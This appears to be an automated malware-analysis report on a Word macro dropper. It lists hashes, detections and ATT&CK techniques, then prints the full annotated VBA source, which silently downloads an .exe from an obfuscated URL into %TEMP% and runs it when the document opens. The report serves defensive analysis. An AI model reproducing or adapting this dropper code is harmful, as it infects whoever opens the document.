Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c6391314437e37f7…

MALICIOUS

Office (OLE)

184.0 KB Created: 2016-05-18 22:54:00 Authoring application: Microsoft Office Word First seen: 2017-12-08
MD5: 5ee2826df71cba6ea09b4e91298f9673 SHA-1: d916f3aec1072812187ac3c336257b26a7b34b18 SHA-256: c6391314437e37f723c2863a9c465d26ac0e76a18aedad701cb554bac0895a3d
330 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1105 Ingress Tool Transfer

The sample contains VBA macros, including a Document_Open macro that triggers the execution of WScript.Shell. This indicates the file is designed to download and execute a secondary payload, a common tactic for malware droppers. The ClamAV detection as 'Doc.Dropper.Donoff' further supports this assessment.

Heuristics 10

  • ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim YTYHvMy As String
    Set FwOAjkes = CreateObject("WScript.Shell")
    End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim lgtAQkWSsr As Boolean, RKLHuagrZb As Integer
    Set AnOwrplIi = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    Set UYDawqMqKZ = AnOwrplIi
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Public Sub Yyczsv(ByVal msoREbHRg As Integer, ByVal fyrHqVmcqW As Variant, ByVal jAStzg As Variant, ByVal qkTjdr As Object, ByVal ZItQEuJW As Variant, ByVal MvhHS As Integer, ByVal wCQmt As String)
    CallByName qkTjdr, wCQmt, 1, jAStzg, ZItQEuJW, fyrHqVmcqW
    End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
    Dim cdBkLmGIW As Integer
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8921 bytes
SHA-256: 817d22b31c0d356e4091be6df6a571aaa271961fc78d1aef43ff7081a5b10673
Detection
ClamAV: No threats found
Obfuscation or payload: likely
166 of 247 identifiers look randomly generated (e.g. 'CWvH4FVkTRaTYuAxrOGEIsHdtKFeGYuX') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Decoy: NddjA, XBccwj, kdFtL and nuvzfFK are not defined anywhere in the
' visible listing, and nothing on the Document_Open path calls this function.
' Presumably filler to pad the module and defeat signature matching.
Private Function BfAXNeAvth() As Integer
NddjA
If XBccwj(5601, "AFdEZROnl3KupGt8dyusf") Then
kdFtL
Else
nuvzfFK
End If
BfAXNeAvth = 8139
End Function
' Auto-execution entry point: Word runs this when the document is opened.
' The two locals are never used; the only real statement hands control to
' EVyANS.mUOaCnq, which starts the download-and-execute chain.
Private Sub Document_Open()
Dim cdBkLmGIW As Integer
Dim vEQKcZwik As Integer
EVyANS.mUOaCnq
End Sub
' Decoy: mJgHQ and gcLIjQ are not defined in the visible listing and this
' sub is never called from the reachable code.
Private Sub mRJBz()
mJgHQ False, False, 4238
gcLIjQ True
End Sub

Attribute VB_Name = "EVyANS"
' Dropper logic. The entry point is mUOaCnq (called from
' ThisDocument.Document_Open); it runs ILHESLY, which
'   1. downloads a URL with MSXML2.ServerXMLHTTP.6.0 (HgIjr.UYDawqMqKZ),
'   2. writes the response body to a fixed .exe name under %TEMP% with
'      ADODB.Stream (HgIjr.aglPXucX), and
'   3. starts that file via WScript.Shell.Exec (HgIjr.FwOAjkes).
' Every COM member name is decoded at runtime by vuhepCEa.vDnvYyHf(a, b),
' which returns b with every character that occurs in a removed; the decoded
' value is noted on each call below. Assignments to undeclared names
' (e.g. IaFbCbvQf = 5255) and unused Dim lines are filler with no effect.
' Decodes to "PROCESS" — the name of the WScript.Shell Environment
' collection read in jSxGl.
Private Function iAzsYSi() As String
iAzsYSi = vuhepCEa.vDnvYyHf("3oLDj9", "P3R39OCLE3So9S")
End Function
' Filler literal; passed to oIdgyMEhj.PHIloBIoQ as dbEzyHO, a parameter
' that sub never reads.
Private Function QKUDQo() As String
QKUDQo = "yaTBPzzqTUcSQtBE3DTZSh"
End Function
' Decodes to "User-Agent".
Private Function OOLHqHn() As String
OOLHqHn = vuhepCEa.vDnvYyHf("F26o/L", "LUsL/e2ro-/ALgeFont/")
End Function
' Decodes to "/7eb0ec9f640bbe.exe" — the drop filename appended to the
' %TEMP% value in rRMGIZYHS. Useful as a file-creation detection artifact.
Private Function LrKuGVcf() As String
Dim oFCOThwJ As Integer, GJjGE As String
LrKuGVcf = vuhepCEa.vDnvYyHf("M lUa8", "U/a7e8b a0Ueac 9af6U4l80abUbMe. e88x e")
End Function
' Decodes to "Environment" (WScript.Shell.Environment). The assignment to
' bLjwgJSUR is filler.
Private Function rxNlBsYJgf() As String
bLjwgJSUR = "Xcec07A7sMyqqphBJdqMiYM6e1n"
rxNlBsYJgf = vuhepCEa.vDnvYyHf("NgYqcZ", "ZEnYYviYYrgongmceNYnct")
End Function
' Returns the decoded download URL (see XhQVhW).
Private Function usbTVQw() As String
usbTVQw = XhQVhW
End Function
' Writes downloaded bytes to disk through ADODB.Stream.
'   fNSfnHxBZu  destination path (from rRMGIZYHS)
'   tcWoyFVZ    unused
'   CqNlsoBFp   response body bytes (http.ResponseBody)
'   kHysdmQYN   unused
' Sequence, with decoded member names: Type = 1 (binary; CallType 4 = VbLet),
' Open, Write body, SaveToFile path, 2 (overwrite), Close.
Private Sub ugQJPdNec(ByVal fNSfnHxBZu As String, ByVal tcWoyFVZ As String, ByVal CqNlsoBFp As Variant, ByVal kHysdmQYN As String)
Dim tEjGi As String
Dim yzeOsya As String
IaFbCbvQf = 5255
Set lFSQRhj = HgIjr.aglPXucX
oIdgyMEhj.XFqDwI 1, vuhepCEa.vDnvYyHf("LBoZgmq/", "mTZypoeq"), lFSQRhj
oIdgyMEhj.RkURSUq lFSQRhj, 8172, vuhepCEa.vDnvYyHf("PiG1UjQ", "OipPeGni"), PTeEPbdC
oIdgyMEhj.PHIloBIoQ CqNlsoBFp, PTeEPbdC, lFSQRhj, 7897, DlBSx
oIdgyMEhj.ziLCmkuNhj 2, vuhepCEa.vDnvYyHf("fJGc9mC0", "JSaCvceG0TJoFmGiCleG"), fNSfnHxBZu, lFSQRhj
oIdgyMEhj.RkURSUq lFSQRhj, 8172, vuhepCEa.vDnvYyHf("KMwhE6", "6C6lo6Eswe"), PTeEPbdC
End Sub
' Decodes to "SetRequestHeader".
Private Function AUUxg() As String
AUUxg = vuhepCEa.vDnvYyHf("Okxw0KC", "kSOektwRweqOuOOeswtkHwexKa0dxerk")
End Function
' Decodes to "Open" (used for the XMLHTTP object; the same encoded pair is
' reused inline for ADODB.Stream.Open in ugQJPdNec).
Private Function wvdXdacLdh() As String
QhJzBSkuli = 9116
wvdXdacLdh = vuhepCEa.vDnvYyHf("PiG1UjQ", "OipPeGni")
End Function
' Orchestrates the chain: download (hboOvyFIME) with the URL and the
' %TEMP% path as ByVal arguments, then execute (ASBVL). "On Error GoTo
' iXThHt" jumps to an empty label, so any failure (no network, blocked COM
' object, write error) is swallowed silently — no visible error to the user.
Private Sub ILHESLY()
Dim rsSUpNilWx As Integer
On Error GoTo iXThHt
hboOvyFIME usbTVQw, rRMGIZYHS
nHFskkviX = "e98AKWct7qR5s3fxAsherI9T1C7"
ASBVL rRMGIZYHS, "9P5FyR3Adyc8Mdv2L3VbfsY03VDOZ", False
Exit Sub
iXThHt:
End Sub
' HTTP download.
'   QPkSrt    URL
'   pnvMJyvd  destination path
' Decoded sequence: http.Open "GET", url, False;
' http.SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible;)";
' http.Send; then ugQJPdNec path, <filler>, http.ResponseBody, <filler>.
' The fixed User-Agent string is a usable network-detection artifact.
Private Sub hboOvyFIME(ByVal QPkSrt As String, ByVal pnvMJyvd As String)
Set yjchvtBrHe = HgIjr.UYDawqMqKZ
oIdgyMEhj.Yyczsv 6693, False, vuhepCEa.vDnvYyHf("KAgQjJ2L", "GKLEAT"), yjchvtBrHe, QPkSrt, 9594, wvdXdacLdh
LfPYoESsUK = False
oIdgyMEhj.ziLCmkuNhj vuhepCEa.vDnvYyHf("h5rHPCZg", "HMHozHHilhglCag/P4.ZZ0H 5(5cComgpharPtigCbPlPe;r)H"), AUUxg, OOLHqHn, yjchvtBrHe
eNLxFz = "CR5P0DL8WcqvghvKrDrTRoNHtX"
oIdgyMEhj.RkURSUq yjchvtBrHe, 8172, vuhepCEa.vDnvYyHf("pZhU24tr", "SZte4ndZ"), "ZzhvC8JaBHNokDgKgbj6klft6"
ugQJPdNec pnvMJyvd, "90kkBPP2Q0FwrUlmyllG", oIdgyMEhj.kHkkw(vuhepCEa.vDnvYyHf("WwH50j7fY", "Rw7esf0poYnWfsej0BwodYyj"), yjchvtBrHe), "WBzUjVrPcz6y2Pea06EJqyVoHZA6Tc"
End Sub
' Decodes to "Exec" (WScript.Shell.Exec).
Private Function JDcAfmKw() As String
JDcAfmKw = vuhepCEa.vDnvYyHf("HqVgy4nv", "Evxvency")
End Function
' Filler literal; only ever passed to parameters that are never read.
Private Function PTeEPbdC() As String
usNmDIucf = "ODpiqUfwF5J0W0QTBc4MAY"
PTeEPbdC = "DmpvjsSg5LXwausuW2vN"
End Function
' Decoy: HQBbc, JPlDg, zniWRh, jQPOuwUO, LYGsIFmC, HghafPQh and rBimKfo are
' not defined in the visible listing; nothing reachable calls this.
Private Function DIvDTY(ByVal DURnVvvG As String) As String
If HQBbc Then
JPlDg
zniWRh False, True, 1880
jQPOuwUO
Else
LYGsIFmC
HghafPQh 2785
rBimKfo 1091, 315, 2975
End If
DIvDTY = "ZtYfYuU9sIFclwg3hU"
End Function
' Reads an environment variable: obtains WScript.Shell.Environment("PROCESS")
' via CallByName (CallType 2 = VbGet) and indexes it with LNuwQuAWO.
' Called with "TEMP" from rRMGIZYHS.
Private Function jSxGl(ByVal LNuwQuAWO As String) As String
Dim oYXdDk As String
COovMr = "jNRQRM1dtGUp5vFzD19d4ulr2E8b80"
Set mrnaiI = oIdgyMEhj.nnvlFvCTM(iAzsYSi, rxNlBsYJgf, HgIjr.FwOAjkes)
jSxGl = mrnaiI(LNuwQuAWO)
End Function
' Decodes (same remove-characters rule) to an http:// URL whose path ends in
' a .exe — the payload download location. Recover the full host with the
' vDnvYyHf rule and treat it as a network IoC.
Private Function XhQVhW() As String
XhQVhW = vuhepCEa.vDnvYyHf("BRfV5qi", "hBqtftpiq:/Rf/hBfpsqaqfz.iicqoqm/qis5ysift5emBR/qcqacVBh5e5/iwqorRVdB.e5fxeR")
End Function
' Public entry called by ThisDocument.Document_Open; the assignment is
' filler, ILHESLY does the work.
Public Sub mUOaCnq()
DSFWQ = 8775
ILHESLY
End Sub
' Decodes to "Write" (ADODB.Stream.Write).
Private Function DlBSx() As String
DlBSx = vuhepCEa.vDnvYyHf("0dYXgI8ls", "lWrliYtgIe")
End Function
' Executes the dropped file: WScript.Shell.Exec(cQdYqjBpz) via CallByName.
' vZDyXem and QyONxtQteG are never read.
Private Sub ASBVL(ByVal cQdYqjBpz As String, ByVal vZDyXem As String, ByVal QyONxtQteG As Boolean)
Dim kMgliq As Integer
Dim NptxyFNuxj As String
oIdgyMEhj.PHIloBIoQ cQdYqjBpz, QKUDQo, HgIjr.FwOAjkes, 7897, JDcAfmKw
End Sub
' Builds the drop path: the process environment's TEMP value (jSxGl("TEMP"))
' concatenated with LrKuGVcf ("/7eb0ec9f640bbe.exe").
Private Function rRMGIZYHS() As String
Dim rGoZjw As Boolean, rfrVlXygqD As String
NzmDVOpD = False
rRMGIZYHS = jSxGl(vuhepCEa.vDnvYyHf("IV6mZvAC", "CTECMmPI")) & LrKuGVcf
End Function

Attribute VB_Name = "HgIjr"
' COM object factories used by EVyANS. Each one wraps a single CreateObject
' call; the extra Dim/assignment lines are filler. The two Private subs are
' decoys that reference names absent from the visible listing.
Private Sub rSynRWHBvi()
QuYYqnyOFO
VmdNCfQ
XducHsOfcu "U3YbQMxRjyUvhL00AxkIahQ5T"
End Sub
' HTTP client used for the payload download.
Public Function UYDawqMqKZ() As Object
Dim lgtAQkWSsr As Boolean, RKLHuagrZb As Integer
Set AnOwrplIi = CreateObject("MSXML2.ServerXMLHTTP.6.0")
Set UYDawqMqKZ = AnOwrplIi
End Function
' Shell object; used both to read the process environment (TEMP) and to
' Exec the dropped file.
Public Function FwOAjkes() As Object
Dim YTYHvMy As String
Set FwOAjkes = CreateObject("WScript.Shell")
End Function
' Binary stream used to write the response body to disk.
Public Function aglPXucX() As Object
kSeUwKWLwH = 3434
Set aglPXucX = CreateObject("ADODB.Stream")
End Function
' Decoy: KbxYhbaay, AvUSfTJh and ZOkaSukV are not defined in the visible
' listing; not reachable from Document_Open.
Private Sub iyTqL()
KbxYhbaay
AvUSfTJh "2U6aOVrwLAfDpjPd45", "CQGm2eKXP5Y5zi86fkX4rUwnG", False
ZOkaSukV
End Sub

Attribute VB_Name = "IkWvmuXyW"
' String primitives behind the vuhepCEa.vDnvYyHf decoder. Each function is
' a one-line wrapper around a built-in, padded with parameters and locals
' that are never read.
' InStr(1, zFXvocax, eiQMkwgWr) coerced to Boolean: True when eiQMkwgWr
' occurs in zFXvocax (position is non-zero). wYeQgox is unused.
Public Function CSRXdAtKM(ByVal zFXvocax As String, ByVal wYeQgox As String, ByVal eiQMkwgWr As String) As Boolean
Dim PSLPQgfGH As Boolean
CSRXdAtKM = InStr(1, zFXvocax, eiQMkwgWr)
End Function
' Single character of FNzbmrdxb at 1-based position iLBXbm. NFzIS and
' UrIMeHBT are unused.
Public Function BbvrjztgpJ(ByVal FNzbmrdxb As String, ByVal iLBXbm As Integer, ByVal NFzIS As Integer, ByVal UrIMeHBT As String) As String
Dim xbUlVccKi As String
BbvrjztgpJ = Mid(FNzbmrdxb, iLBXbm, 1)
End Function
' Len of the third argument only; jQvaiat and HBOck are unused.
Public Function IrmvcR(ByVal jQvaiat As Integer, ByVal HBOck As String, ByVal bZxgc As String) As Integer
Dim mVGkTxzQ As Integer
IrmvcR = Len(bZxgc)
End Function
' String concatenation.
Public Function CyFasBX(ByVal RbGmYiZCwT As String, ByVal fytgk As String) As String
Dim naQgYFNs As String
CyFasBX = RbGmYiZCwT & fytgk
End Function

Attribute VB_Name = "oIdgyMEhj"
' Late-bound COM dispatch layer. Every real procedure here is a CallByName
' wrapper, so no COM member name appears as a literal in the source; the
' name arrives as a parameter after runtime decoding. CallType values used:
' 1 = VbMethod, 2 = VbGet, 4 = VbLet. Parameters not named in the comments
' below are never read.
' obj.<wCQmt>(jAStzg, ZItQEuJW, fyrHqVmcqW) — used as http.Open "GET", url, False.
Public Sub Yyczsv(ByVal msoREbHRg As Integer, ByVal fyrHqVmcqW As Variant, ByVal jAStzg As Variant, ByVal qkTjdr As Object, ByVal ZItQEuJW As Variant, ByVal MvhHS As Integer, ByVal wCQmt As String)
CallByName qkTjdr, wCQmt, 1, jAStzg, ZItQEuJW, fyrHqVmcqW
End Sub
' obj.<BDArQUS>() with no arguments — used for Send, Open and Close.
Public Sub RkURSUq(ByVal RNAqBZZcT As Object, ByVal aztJBLPYZ As Integer, ByVal BDArQUS As String, ByVal plwWX As String)
CallByName RNAqBZZcT, BDArQUS, 1
End Sub
' Property get obj.<KGrZV>(FKWUxLR) returning an object — used for
' WScript.Shell.Environment("PROCESS").
Public Function nnvlFvCTM(ByVal FKWUxLR As String, ByVal KGrZV As String, ByVal OosWfTWvEz As Object) As Variant
Set nnvlFvCTM = CallByName(OosWfTWvEz, KGrZV, 2, FKWUxLR)
End Function
' obj.<aTctmMJ>(hkqAIfxYT, ODnRlDFSa) — used for SetRequestHeader and
' SaveToFile.
Public Sub ziLCmkuNhj(ByVal ODnRlDFSa As Variant, ByVal aTctmMJ As String, ByVal hkqAIfxYT As Variant, ByVal dPHbadwqZ As Object)
CallByName dPHbadwqZ, aTctmMJ, 1, hkqAIfxYT, ODnRlDFSa
End Sub
' Decoy: the called names are not defined in the visible listing and this
' function is not reachable from Document_Open.
Private Function mEaUh(ByVal tBKnR As String, ByVal MZCBfpFa As Integer) As String
jzfxURr 2340, 1181, 9816
piAMuSXS 6132, 4579
LXMizfaoij
If dADtLeg Then
uTkVafb 508, 9861
wqQuLT "83qwoTI46fH86YIRhIHE7FqAntlCF0s", 3675
SlRmBd
End If
SCMoUyqWX
mEaUh = "tQz8C4xCDvJ9u97tL6"
End Function
' obj.<fjIGF>(jimiivbZN) with one argument — used for Stream.Write(body)
' and Shell.Exec(path).
Public Sub PHIloBIoQ(ByVal jimiivbZN As Variant, ByVal dbEzyHO As String, ByVal Gdacrqk As Object, ByVal kTudrn As Integer, ByVal fjIGF As String)
Dim pWwyoRc As String
Dim sGUPOnts As String
CallByName Gdacrqk, fjIGF, 1, jimiivbZN
End Sub
' Property get obj.<EfwqvF> — used for http.ResponseBody.
Public Function kHkkw(ByVal EfwqvF As String, ByVal jiFIXDnmA As Object) As Variant
kHkkw = CallByName(jiFIXDnmA, EfwqvF, 2)
End Function
' Property let obj.<EDLMZ> = RKtzznPc — used for Stream.Type = 1.
Public Sub XFqDwI(ByVal RKtzznPc As Variant, ByVal EDLMZ As String, ByVal kzrbE As Object)
CallByName kzrbE, EDLMZ, 4, RKtzznPc
End Sub

Attribute VB_Name = "vuhepCEa"
' Decoy: OfSXF, yHQxN, dgWaQn, QREzQooq, gxyGcw, qnYhDzuW and bBjpOnw are
' not defined in the visible listing, and nothing reachable calls this sub.
Private Sub rtYfAOu()
OfSXF "H0lEIdAM8aCMLGge3IpGciCrDoY", 6165
yHQxN
dgWaQn
If QREzQooq Then
gxyGcw
Else
qnYhDzuW
bBjpOnw "ba4GRnfjqG6yf1AV9grVMn0qiq6L9", "sDIzGJuaBfwO5oKf7BrKi"
End If
End Sub
' String decoder used for every COM member name, the User-Agent, the URL and
' the drop filename in EVyANS.
'   tBFudfVBpz  set of characters to strip (a "key" string)
'   FIcuAX      encoded string
' Returns FIcuAX with every character that occurs in tBFudfVBpz removed:
' the loop runs 1..Len(FIcuAX) (IkWvmuXyW.IrmvcR), tests each character
' with InStr against the key (CSRXdAtKM), and appends it (CyFasBX) only when
' it is NOT found. Comparison is InStr's default, presumably case-sensitive
' unless an Option Compare Text line exists above the visible listing.
' The literal assignments to SBuYvDo, sEodtQL and BhvAq are filler.
Public Function vDnvYyHf(ByVal tBFudfVBpz As String, ByVal FIcuAX As String) As String
Dim trehmFHGp As Boolean
Dim BLyxDWDTB As Integer, xaMXvJj As Boolean
SBuYvDo = 5338
For VXLJS = 1 To IkWvmuXyW.IrmvcR(3700, "CWvH4FVkTRaTYuAxrOGEIsHdtKFeGYuX", FIcuAX)
trehmFHGp = IkWvmuXyW.CSRXdAtKM(tBFudfVBpz, "OrIL4VcGdyxLXhOvtHroMG", IkWvmuXyW.BbvrjztgpJ(FIcuAX, VXLJS, 2535, "V25FpBOGrvp9NbRTIC"))
sEodtQL = "C5Et8sW3qle0qqFillRQXi3LRkYAzjX"
If Not trehmFHGp Then
vDnvYyHf = IkWvmuXyW.CyFasBX(vDnvYyHf, IkWvmuXyW.BbvrjztgpJ(FIcuAX, VXLJS, 2535, "tt5JSSHZJeeDcGRZsWsnokyEziCiI"))
End If
BhvAq = "XE0FuXtZYOZ9hgGwp3IWW6R"
Next
End Function
' Decoy: mGpHG, iUWnPbt, MwUvLHxI, QXMkh, aEcIpbKw and wVbejPo are not
' defined in the visible listing; not reachable from Document_Open.
Private Function Ixqspr(ByVal FJiAiIAhcf As Boolean) As String
mGpHG "InUVmgqbElqdRQU0Bg8DmF5aiGDYH", True, 9730
If iUWnPbt(1475, 8375) Then
MwUvLHxI
End If
QXMkh "bsqsPVkLKjYd5m5VwinNpJ9B8TC", 3269, False
aEcIpbKw True
wVbejPo
Ixqspr = "ZNdrcdGRU2SukNhC0t4n"
End Function